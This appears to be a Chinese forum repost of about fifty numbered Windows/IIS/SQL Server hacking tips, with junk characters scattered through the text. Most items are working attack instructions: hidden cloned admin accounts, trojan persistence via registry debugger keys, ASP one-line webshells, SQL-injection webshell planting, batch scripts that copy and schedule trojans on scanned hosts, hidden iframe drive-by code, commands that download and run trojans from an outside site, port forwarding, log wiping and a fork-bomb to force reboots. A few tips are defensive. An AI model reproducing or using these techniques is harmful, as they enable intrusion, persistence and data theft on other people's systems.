Xp系统修改权限防止病毒或木马等破坏系统,cmd下,: R- c8 y( x0 L! S
cacls C:\windows\system32 /G hqw20:R
9 N) a! O3 c3 |% Q& G6 l思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入! e: K( K2 o5 X9 D0 I
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
2 ?& w; H8 l$ U J) g8 Y& B. E# E0 R
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
6 q: ^ s/ R- W; |
' {% E# q. D; h( h0 ?3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。1 f( E0 c( T: C/ J$ R' i
" \' E/ V- W4 I4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
# }9 l _! W/ f8 f& o5 u/ _
( K6 X K( F, C6 q, m$ a# C# ]. Z5、利用INF文件来修改注册表
p( k2 o% D3 a8 d[Version]
6 C# N8 J+ {+ U+ r4 `, W3 }9 ?# CSignature="$CHICAGO$"4 z/ O4 T3 n* G: u: U
[Defaultinstall]1 n6 S: _' |) Z+ R4 i. A7 b
addREG=Ating) s8 R* S& _( o2 I$ A6 A
[Ating]
( Z. e' }' U6 {% y6 pHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
5 O, T/ g: R. [8 ^以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
* E' F! Y9 C" B8 L% v' o% g* krundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径- g/ q/ v: m \- |
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
9 S; T. ?$ f, b9 n9 `; ]HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
. j) d6 }& r% Y" kHKEY_CURRENT_CONFIG 简写为 HKCC
% \3 C2 T* C9 O0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值% k$ \8 D: L5 D: y
"1"这里代表是写入或删除注册表键值中的具体数据
: p$ i; R H" v8 F$ S* J7 }3 k. E6 X- l. P! J5 U/ W' f
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,8 O9 J4 Q! m& q+ N( t. R2 }
多了一步就是在防火墙里添加个端口,然后导出其键值) O+ s6 P; j [/ f
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]7 \7 p% V. Q _! \) A
' O, T8 X r( H2 i( o/ Y; R7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
) [6 E* B: p$ \9 [% F在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。- y9 ~" F, K: R" W' j
8 x" b I1 G+ a. O8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
a. \ M1 J$ a8 j9 r" o1 O V" u0 o, X8 u# W% f1 k; J5 Y' }
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
: Q, Z r1 s% D- `3 ^/ z8 l! b可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
- M+ A- T3 m3 t2 k! `2 O6 U o# b8 u( N2 E4 ~
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
; t) G9 P) o7 [
2 I- r1 T7 t( r3 _. W11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,# v2 q6 y: H" R9 H, h! `
用法:xsniff –pass –hide –log pass.txt% ?2 I& c% w$ \5 z: o2 x. v
+ m$ p Q; l9 G, ~. l4 H, Y7 B12、google搜索的艺术
- V$ Y* x( I# ~* H搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
# g. i+ t' `, ~" |) ^或“字符串的语法错误”可以找到很多sql注入漏洞。
. ^* F: R/ |# `# o- L, ~4 u0 z# z" F7 Z1 j( _
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。* @+ [( `' q" }3 ]
l$ P9 }( F" l, S8 o. N14、cmd中输入 nc –vv –l –p 1987& [$ r6 E* s% l- U: ?# w
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
# h/ z( B7 a; b0 x$ s3 M. F
7 _2 B% A2 |; c5 G15、制作T++木马,先写个ating.hta文件,内容为9 F1 m& D3 j9 V0 p S+ a
<script language="VBScript">
7 U0 O a2 U$ h8 nset wshshell=createobject ("wscript.shell" ) B& ~5 @5 F- ^$ ~1 J
a=wshshell.run("你马的名称",1)
3 l) I/ G2 q5 V7 O* r; ~window.close
/ a& _6 L5 E; T& p4 J$ y3 \' l. u" e</script>
) x5 ]7 | |+ w再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
/ V5 _* G( g- h+ k* J5 D( x# W+ E2 ?# \" V, U. V# T
16、搜索栏里输入
1 a) l m. M1 V" W5 @! T关键字%'and 1=1 and '%'='/ f+ L3 R- {' _6 X- n
关键字%'and 1=2 and '%'='
5 k- P. d/ J. d+ L% @比较不同处 可以作为注入的特征字符; N7 e+ o7 S+ h- e% C7 Q) o
4 H* ?& z+ U' z17、挂马代码<html>
0 G; l+ G$ j! I. O8 \* D- n<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
& Z9 f/ G) s Z- H" D</html>
0 Q+ [7 [& g7 ?" J( a. q7 c' K
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
. ^' ~9 _3 c" v* ?net localgroup administrators还是可以看出Guest是管理员来。
X- b' f2 A) u2 o' N1 u% n3 l' Y( y) \5 _" z* v
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等5 w( C+ L Q: j5 t" ^- J. {& t+ o! U) W
用法: 安装: instsrv.exe 服务名称 路径
% {! {& A+ Q( @+ L |3 B" r卸载: instsrv.exe 服务名称 REMOVE
4 F* Y; I4 Y- D) n4 C/ n! F( a% R5 ?( `9 q0 P0 H, Z
; U& q3 I2 j/ C% d( Z21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉$ K; x& O" M1 M" ^& c, H
不能注入时要第一时间想到%5c暴库。/ v' ?2 M* w7 ^! e
5 M, J/ ?; n6 ^22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~4 W0 Y& l: L7 K9 e
, N( y0 D. U+ C; ?! v2 m6 x23、缺少xp_cmdshell时
& ?: B/ {) w# r D3 i尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll') Y* f3 L* v) J; g+ r
假如恢复不成功,可以尝试直接加用户(针对开3389的)5 ]& S; N L2 ?1 h% u0 C$ d% C
declare @o int1 l6 [6 f$ O9 Z c$ _- P
exec sp_oacreate 'wscript.shell',@o out0 ?5 r7 g4 x5 B
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员# z* `2 m6 [; M" ?: H) {' P* {
% G* Q T M" ^) D9 x
24.批量种植木马.bat
, M/ I/ _) T4 c3 X5 W7 d+ dfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
2 s5 _; m5 B1 ` i% b4 H, T+ K+ L& s0 Cfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间6 p9 ?. B% N K- j4 M9 U4 j; o
扫描地址.txt里每个主机名一行 用\\开头! E) H2 i# y6 ] s
; [% E5 C, b+ d6 W25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。1 {: M8 g) ?1 y. J
6 v# U- s1 n3 r. ?* b5 {& c26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
1 H0 D4 u( p9 L v将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下. s# A+ w. G3 C. S2 P8 N
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马3 M/ e* u- R6 x9 M
1 w9 t8 l! f/ a" [) k/ k27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP1 N) @/ {0 n8 q, L
然后用#clear logg和#clear line vty *删除日志
! T6 x; }5 X2 u, H4 ^; ~. Z. S# z4 M6 c/ [' E; A- @! Z- x, I& B
28、电脑坏了省去重新安装系统的方法
; u+ l" Y# n9 ?5 Q1 c纯dos下执行,
+ ^1 m# w/ @# s% o2 l% Kxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config3 _+ q9 b) y1 b6 H
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config# s$ @) T) X+ w9 g
: ~* X7 J4 Z: R29、解决TCP/IP筛选 在注册表里有三处,分别是:+ h+ K0 B' J5 ?8 ?
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip+ y6 p8 u, w* [. r) ~8 s) s5 {7 Z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ Q2 {) o: U' b; YHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 n/ L. f% Y( K0 Z/ f" y- f9 a
分别用
4 I$ X5 r+ j7 M* K8 Bregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% D8 Y! H5 n1 Y0 P, Z
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip5 F2 [1 r- q) [& h: c
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# b; a- K% u; J$ o2 ~命令来导出注册表项: s6 i& V3 N% a! V$ h7 U1 w; G* M7 h
然后把三个文件里的EnableSecurityFilters"=dword:00000001,3 T! Y0 [2 u, N8 d! B( i
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
/ O4 }4 w7 n i! r1 f5 w5 Pregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
8 E/ M( Q, o, h( u! M" }7 {3 Z( o8 j. L5 {0 D
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U# A A8 J7 X J9 q) F
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
" |8 o& V3 k: k/ _- }8 L
* f+ x% q5 X0 c" W6 ?5 q; w' u31、全手工打造开3389工具
: t3 c1 c. B) I1 k打开记事本,编辑内容如下:: b# C) j9 S5 I4 ?- W6 Q4 r
echo [Components] > c:\sql) Q5 Q7 l3 v2 `- p; n- G
echo TSEnable = on >> c:\sql
3 k1 P$ s0 M4 a. Tsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q* X* v1 E% V& L% P Z6 ]8 G t
编辑好后存为BAT文件,上传至肉鸡,执行1 v/ s! @( ^: @ i
g. \% Q2 S7 b. B4 l# C+ [32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
& V: A1 }8 C0 L& F$ G1 Y: f. Z! e" @3 ?8 @6 G) T# o8 ~: t7 Y
33、让服务器重启
1 ~' Q2 S5 J1 X. D0 }写个bat死循环:
9 p% _5 G( a- s+ l6 c@echo off9 D& `' Y9 i, z
:loop1
8 I: B" ?) z: _7 c. wcls+ _! L: ^ } ^7 P
start cmd.exe% P! b7 c6 w1 Z$ } U4 M6 ~/ P
goto loop1
2 u3 `/ h% e* {/ a保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启/ q: U. _( q& h$ p9 f
: P4 Q# o* P, H$ Q- F+ J+ ~34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
' j; P/ W+ R- r1 Y: I: a b@echo off6 q n5 z4 I7 ^2 X
date /t >c:/3389.txt* ]- Q& V/ N# J2 F9 r
time /t >>c:/3389.txt$ g6 J4 q& x m0 I0 W8 V
attrib +s +h c:/3389.bat3 J5 e, i8 U7 b
attrib +s +h c:/3389.txt/ J r! b9 i' D! g' L; \) Y
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
- |- V! g( n2 J3 d. o; }, P# t: j并保存为3389.bat
8 A" G, b: @: Y3 Z0 W4 j打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
9 s8 d( r3 L. B' h, v- J9 a0 I2 L8 o& K
35、有时候提不了权限的话,试试这个命令,在命令行里输入:& M+ \* `; K& v8 r7 Q* e# D/ G- C
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)4 f( j0 F, l( M3 O, e/ T
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。* I- V" ]# Q( G; `
; V& n( U, Q& F3 m$ Y" ]36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件4 K% d$ u! @8 \
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址, H$ c7 y3 u% ~' Y( l
echo 你的FTP账号 >>c:\1.bat //输入账号- n( U) Q4 ?6 G. l) Q
echo 你的FTP密码 >>c:\1.bat //输入密码: s U& v1 }& T
echo bin >>c:\1.bat //登入
. C+ l" [6 p0 Q0 Q. N: xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么2 _5 l: U" T) s
echo bye >>c:\1.bat //退出
4 e8 v9 v! N* ~然后执行ftp -s:c:\1.bat即可
) j6 |: z: K& K, m$ S9 S( j( D9 g# C: X
37、修改注册表开3389两法
1 G7 Z5 a4 R2 P) U* C- k(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
" H7 w/ j( [; m/ Zecho Windows Registry Editor Version 5.00 >>3389.reg
( i! r2 l6 d8 O/ t2 fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg- i6 z* v/ d$ X1 I: A
echo "Enabled"="0" >>3389.reg
! ~5 P2 [; j8 l& Yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
1 a B& N9 h. p) Q: @NT\CurrentVersion\Winlogon] >>3389.reg5 R6 m" l7 R b1 V* D. W! t
echo "ShutdownWithoutLogon"="0" >>3389.reg
1 ?4 D1 K' O' c' \' Y: F+ gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
v9 l$ ^4 |) H* `+ L, x>>3389.reg+ Y: J- c) @: w$ A. o3 ]9 ^6 R
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
# x+ e7 @/ J. t7 Z" lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
. F# ]5 p6 j+ e ]' d' b5 Y>>3389.reg7 i* i/ ]9 b) b* S$ K! E1 t' p, ]
echo "TSEnabled"=dword:00000001 >>3389.reg
+ N: m- a: B/ C- Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
% p# J4 S5 ]) h9 gecho "Start"=dword:00000002 >>3389.reg9 } w, {, u3 g! {6 D, \5 P9 m* @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]2 K. \( Y; W6 h6 L8 n& z Z3 Z
>>3389.reg
3 \2 ]0 L }: \+ N3 ?) Vecho "Start"=dword:00000002 >>3389.reg
, H. X; O. ^ H" [- becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg. ]) B4 m# E ~9 ^ A
echo "Hotkey"="1" >>3389.reg- J; @) o3 }; r9 ^ J; m0 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( @* M Y( @9 o9 i
Server\Wds\rdpwd\Tds\tcp] >>3389.reg' q9 {) Y1 J. K! y4 T8 s; P
echo "PortNumber"=dword:00000D3D >>3389.reg
* X% Q4 f) G! @- H4 lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, o5 G" @$ Q5 r. u, i d
Server\WinStations\RDP-Tcp] >>3389.reg
( l; x- n& Y/ z* Q1 P4 becho "PortNumber"=dword:00000D3D >>3389.reg
. |( B( n8 Q: x3 l把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
* l+ c+ u! }1 ^3 O(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
- u+ H# W; x6 ?: Q! U- m因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效; R3 w1 s, D/ A5 k
(2)winxp和win2003终端开启
. x0 z( \( k0 h. K+ m用以下ECHO代码写一个REG文件:
0 C+ B2 V0 ]$ Z0 f2 decho Windows Registry Editor Version 5.00>>3389.reg/ f, Z, O9 S* h' Z, n: a: s2 L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 Z0 u& b7 A1 G/ X3 X+ M$ R
Server]>>3389.reg
7 C6 G a8 w" D8 B( H' @9 zecho "fDenyTSConnections"=dword:00000000>>3389.reg
* z3 C" {, e4 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 _. a: B( c: i7 E+ WServer\Wds\rdpwd\Tds\tcp]>>3389.reg/ W3 T6 w0 a h/ c
echo "PortNumber"=dword:00000d3d>>3389.reg4 H/ [6 X6 g) [0 h' ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
]- r; _5 d' }2 S; \& [# ~Server\WinStations\RDP-Tcp]>>3389.reg* ^( E5 F9 s h7 i
echo "PortNumber"=dword:00000d3d>>3389.reg
8 q3 s# ^' h" q! s- V! I然后regedit /s 3389.reg del 3389.reg% I9 I: ?% T a! T' E, N0 E
XP下不论开终端还是改终端端口都不需重启
) D4 n7 d) x& x7 b' H4 R% J" R* F# k
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃+ O/ f1 |/ q( Z
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
% g7 b" T2 H9 C9 [; {9 A! z/ s0 p# G0 Y
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!: Z2 ^2 `& C6 ^. u
(1)数据库文件名应复杂并要有特殊字符
# k% s5 i. N5 v1 [(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
7 B" y* i' Y5 O# B" }% K9 P将conn.asp文档中的
2 C7 ^- N* p" i# H1 TDBPath = Server.MapPath("数据库.mdb")- T. n" t8 a4 \. r( j2 C4 u
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath: U/ l9 [1 C! s1 L7 @* ]; t
0 U* f8 O% E3 {. m0 P8 \, x
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置; P ]" K6 R$ ^
(3)不放在WEB目录里. H9 a" \0 ~% c5 ?) Y
8 w' |4 o% a8 m0 j
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉1 W; N. `& T$ Y; }$ s+ K
可以写两个bat文件4 }! X7 y) ~( N5 m' a
@echo off, Z& f4 q/ v* R1 z
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe' B; s2 y4 Y2 i ]# `
@del c:\winnt\system32\query.exe
) D& V ]; _7 Z9 D@del %SYSTEMROOT%\system32\dllcache\query.exe
' n9 ?9 Y+ z6 P: T6 c@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的% K0 R! S' W& [+ Q0 C4 T
8 J E5 `/ Q4 K0 a, h+ k6 k0 |@echo off) c3 U& b3 l+ P6 g1 ?9 ]4 O8 e
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
/ ?4 t, x& M& d@del c:\winnt\system32\tsadmin.exe
, _2 q2 `* ^: N3 X1 `/ Q/ H& q@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
; s2 N, Y0 J+ F9 z8 ~# C
) i' E% ^6 A# T0 W/ _) p41、映射对方盘符: Z8 J8 R8 M% H' }
telnet到他的机器上,9 f8 h% b L# X( W: h3 i/ s6 x
net share 查看有没有默认共享 如果没有,那么就接着运行5 J5 p& `1 `! v) m7 y( m
net share c$=c:: L4 \/ I2 E( p7 p
net share现在有c$
* b4 h+ Y( v8 t( Y在自己的机器上运行
6 G# e; M% r# ~; Y8 E8 F4 @- z$ {net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
6 B3 p, z; s) Y1 R/ {4 `/ f1 g/ L+ _( o
42、一些很有用的老知识1 b) R/ V/ z- P% _* s
type c:\boot.ini ( 查看系统版本 )
1 }# p) ^! w/ M; d8 i9 }# _net start (查看已经启动的服务)
1 s9 s) j7 N" p i. R S7 oquery user ( 查看当前终端连接 )0 V) c# [) V2 a3 N: o
net user ( 查看当前用户 )
6 V# F: h* y/ H+ e, F6 xnet user 用户 密码/add ( 建立账号 )
- p% V3 U/ i3 Z% Inet localgroup administrators 用户 /add (提升某用户为管理员)
+ d, [+ D$ P- h$ r* p5 E* uipconfig -all ( 查看IP什么的 )9 ^2 M( {; e/ `$ V8 Z
netstat -an ( 查看当前网络状态 )1 J" z. I; n/ ~
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
" h8 T- X8 @/ O3 u( f3 }2 x克隆时Administrator对应1F4$ x$ N% L! G4 S7 s5 Z6 y* L
guest对应1F5
2 K: T, L. s% w$ Ktsinternetuser对应3E8' r" Q! A1 w* E z* `. o6 }- T
+ Z6 Y, @! w8 x6 M43、如果对方没开3389,但是装了Remote Administrator Service
9 a3 U4 W0 C! u+ ]2 d) h用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接- w, {. r9 x, d+ o
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
: ^+ ?7 V) w' U; Y0 _先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"5 M$ p1 G& R/ E# b. Z
2 W+ a4 O f7 x% t q& `
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
7 }9 J) n$ L/ Q& l5 ^本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
# ?- b- ^* N) I: L5 n1 t" e! M3 }8 c( c- K' [! b# d
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
8 f& j" W- ?( e1 H0 e$ Recho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open- ^- J* }4 l2 \. s9 L- c
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
! g( ?. {$ g S+ ACreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =- n2 p" z/ I2 r$ m2 f6 b- }
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs4 @/ w$ ~" T% H1 H, n* |% d4 d
(这是完整的一句话,其中没有换行符)
8 V5 b7 I; x, }( S$ b8 _* k1 N然后下载:
+ J; N/ y; \4 y- i1 hcscript down.vbs http://www.hack520.org/hack.exe hack.exe
. w) Z" q' F7 }7 h3 f/ Y
3 N, A" P! C Q, r46、一句话木马成功依赖于两个条件:7 E5 Z1 ~/ l( ~% v$ _; Z5 y% H3 v
1、服务端没有禁止adodb.Stream或FSO组件5 U3 `8 A; e! V; _
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。0 \) ^$ h O( S. \: ^2 k$ L; U
& |% ?6 f; o& y7 q+ \
47、利用DB_OWNER权限进行手工备份一句话木马的代码:, h5 X4 k; l& W8 U C- l
;alter database utsz set RECOVERY FULL--1 Y8 ]' W8 t. z! Y; J) K- U9 T
;create table cmd (a image)--% W T, w8 ^7 V4 [ T
;backup log utsz to disk = 'D:\cmd' with init--
0 I4 q: B4 |7 d' K% E7 i S+ { v;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--; S( F8 @% y+ @: |& g* K
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
6 G& y$ b0 S8 o注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。% ]5 |0 r3 U5 C# i+ ?
% Z* |0 h6 H5 Z. t8 {' I48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
1 B8 s% m. c T, Z7 {: T6 `) }' o2 d( |$ @7 B9 j" h! c
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
( X# C m' o1 i, h所有会话用 'all'。$ }3 z2 ?% O( Z/ |4 U$ Y/ c
-s sessionid 列出会话的信息。
. r: v! j. x) w: c-k sessionid 终止会话。
8 v* p* i1 D' x4 m; y% D-m sessionid 发送消息到会话。& ~9 S# Q. [9 b# @; W _( Y: G
* z/ G3 Z2 q1 }# S; Gconfig 配置 telnet 服务器参数。
. E/ l, i7 l3 U; T w# B( x1 F
( c* d! K# T+ @/ v8 icommon_options 为:6 @0 j1 Q. ?+ G! B) I2 y
-u user 指定要使用其凭据的用户
, A2 a5 B) G; h& p2 t( u( O5 _-p password 用户密码0 e) Z3 R+ A* S' D
- g$ e% ^& g1 S9 t1 `config_options 为:
9 F1 J, d# p6 {9 Zdom = domain 设定用户的默认域
* n& A; ?; d: W& Octrlakeymap = yes|no 设定 ALT 键的映射
3 I, K5 V- J( @9 ~) s" Rtimeout = hh:mm:ss 设定空闲会话超时值3 T4 O, k! k: v1 ?; P& S
timeoutactive = yes|no 启用空闲会话。
2 ~, T/ g1 y4 imaxfail = attempts 设定断开前失败的登录企图数。4 V! k, ^ q4 H4 X
maxconn = connections 设定最大连接数。
2 c2 `3 X T S% U5 Xport = number 设定 telnet 端口。
1 P/ @. d1 k6 }, ^+ Nsec = [+/-]NTLM [+/-]passwd. E1 N; H9 G$ V) X. B+ S0 l
设定身份验证机构9 n) c R' ^, Q+ ~; n' j
fname = file 指定审计文件名。
2 {" p @& D/ O" H9 w$ O8 dfsize = size 指定审计文件的最大尺寸(MB)。' a, V* a4 Q* }* g
mode = console|stream 指定操作模式。
4 f2 E/ D) H n9 g* x5 zauditlocation = eventlog|file|both E( R* T6 k9 C p
指定记录地点* y! b$ g* A0 P& C0 g- ` ]* c U
audit = [+/-]user [+/-]fail [+/-]admin& r* o; t( V' a9 K R! O
: |4 n, z/ J! x, R8 O' c
49、例如:在IE上访问:/ w) z C8 I0 V: e
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/: D& j( X5 R' b5 j/ z' n: U" p/ b
hack.txt里面的代码是:
5 |7 J! k- o0 E2 Z1 K+ b! z6 `<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
& A2 k, f7 a' C. K1 }; X/ d把这个hack.txt发到你空间就可以了!
' }2 `# p# k, z$ r这个可以利用来做网马哦!7 m6 Y- N: ?* I' B
6 l6 g6 ]" ~+ X' p50、autorun的病毒可以通过手动限制!
3 F5 u7 q( |, d6 F9 r3 ^. c7 k* d/ B1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
( g+ I5 j6 [( t% c/ M9 p; A2,打开盘符用右键打开!切忌双击盘符~
% J: l) q) {4 c7 b. Z6 ~3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!9 \) y/ p4 r1 o
# d7 {: @: A. |51、log备份时的一句话木马:; o. Z5 W% H& x* [* ]% g
a).<%%25Execute(request("go"))%%25>* m+ p4 L, _8 | ?; U
b).<%Execute(request("go"))%>
1 {9 i- ]+ `) ^% a- u+ Mc).%><%execute request("go")%><%" B7 f. J! \) r+ ]# \! a
d).<script language=VBScript runat=server>execute request("sb")</Script>, w- b% [7 h: {. J
e).<%25Execute(request("l"))%25>
/ [8 u h! h; H, c: ^; C& C$ Af).<%if request("cmd")<>"" then execute request("pass")%>
* e o! } q' G5 F2 f, h V
2 t& e* X7 ^+ k9 |6 S52、at "12:17" /interactive cmd# [1 x/ J) A3 R$ m g4 j7 v
执行后可以用AT命令查看新加的任务
" i# M2 K8 W+ @3 T) D/ z0 U1 v用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。0 }, y% ^; y5 h S. {; t6 i
8 J& k6 k) Y0 r% w0 L- Y7 S
53、隐藏ASP后门的两种方法. O& u$ K; S- l* H: }
1、建立非标准目录:mkdir images..\
